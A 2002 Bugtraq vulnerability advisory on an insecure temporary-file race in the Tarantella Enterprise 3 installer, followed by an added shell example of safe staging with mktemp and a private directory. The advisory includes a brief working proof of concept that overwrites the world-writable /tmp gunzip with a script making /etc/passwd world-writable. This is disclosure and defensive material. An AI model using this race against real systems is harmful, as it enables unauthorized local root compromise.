7889939 2002-01-26 09:46 -0500  /74 lines/ Larry W. Cashdollar <lwc@vapid.dhs.org>
Sent by: joel@lysator.liu.se
Imported: 2002-01-27  00:15  by Brevbäraren
External recipient: bugtraq@security-focus.com
External CC recipient: vulnwatch@vulnwatch.org
Recipient: Bugtraq (import) <20697>
Comment to text 7885279 by KF <dotslash@snosoft.com>
Subject: Vulnerability report for Tarantella Enterprise 3.
------------------------------------------------------------
From: "Larry W. Cashdollar" <lwc@vapid.dhs.org>
To: <bugtraq@security-focus.com>
Cc: <vulnwatch@vulnwatch.org>
Message-ID: <20020126094434.S26298-100000@vapid.dhs.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

				Vapid Labs
			     Larry W. Cashdollar
			        1/14/2002

Vulnerability report for Tarantella Enterprise 3.

1. local root compromise during installation:

	The installation script provided with Tarantella handles utility
packages insecurely during installation.  A root-owned binary "gunzip"
is created in /tmp with world-writable permissions; the pid is appended
to the filename.


TMP_GUNZIP=$TMPDIR/gunzip$$

$ ls -l /tmp/gunzip16152
-rwxrwxrwx    1 root     root        51808 Jan 14 00:15 gunzip16152

gunzip is extracted:
		    extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
		    extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE

The permissions of gunzip are changed to rwx for all:
	    chmod 777 $TMP_GUNZIP >/dev/null 2>&1
The binary is used during installation:
	    extract $efilename | $TMP_GUNZIP -q > "$efilename"

2. Exploit:

There is a race condition between the time gunzip is extracted and the
time it is used during installation.  In that window a malicious local
user could inject code to compromise the system quickly.

$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh

$ cat /tmp/test.sh > /tmp/gunzip16152

I was able to change the permissions of /etc/passwd to 777 by
performing the above as an unprivileged user.

3. Recommendations:

Perhaps create a directory in /tmp or /var/tmp and use that directory
as a work place?

umask 077
mkdir /tmp/workdir

4. Software: Tarantella Enterprise 3

http://www.tarantella.com/download/e3/

Tested on Linux Debian 2.2
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8QmV21hSQ6Gxh/KoRAhYIAJ0aDduF4k/fHV1O+24W8C6uNkokIwCgp2OL
gaJAw7urwOy0Ue03nEjlH2Q=
=TdDa
-----END PGP SIGNATURE-----
(7889939) /Larry W. Cashdollar <lwc@vapid.dhs.org>/(Rewrapped)
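
The recommendation in section 3 of the advisory, carried through as an added example that is not part of the original post or of the Tarantella installer: the helper is staged inside a private, unpredictably named directory and is never made writable by group or other. The function names and the stand-in "gunzip" helper are constructed for illustration, and mktemp(1) is assumed to be available.

```shell
#!/bin/sh
# Added example (not from the advisory or the vendor's installer).
# All function names are hypothetical.

# Create a directory only the invoking user can enter. mktemp -d picks an
# unpredictable name and fails rather than reusing an existing path, so a
# pre-planted directory or symlink in /tmp is never adopted.
make_workdir() {
    (
        umask 077
        mktemp -d "${TMPDIR:-/tmp}/install.XXXXXXXXXX"
    )
}

# Write stdin to $1/$2. The file is created under umask 077, existing
# files are never overwritten, and the final mode is 0700 (not 777).
stage_helper() {
    dir=$1 name=$2
    (
        umask 077
        set -C                  # noclobber: refuse to overwrite
        cat > "$dir/$name"
    ) || return 1
    chmod 700 "$dir/$name"
}

# Print the ls(1) mode string (first 10 characters) of a path.
mode_of() {
    ls -ld "$1" | cut -c1-10
}

# Constructed demo: a stand-in "gunzip" that only copies stdin to stdout.
demo() {
    work=$(make_workdir) || return 1
    printf '#!/bin/sh\ncat\n' | stage_helper "$work" gunzip ||
        { rm -rf "$work"; return 1; }
    echo "$(mode_of "$work") $(mode_of "$work/gunzip")"
    rm -rf "$work"
}

demo    # prints: drwx------ -rwx------
```

With the directory at mode 0700, another local user cannot reach the staged file at all, so the window between extraction and use described in section 2 is no longer exposed.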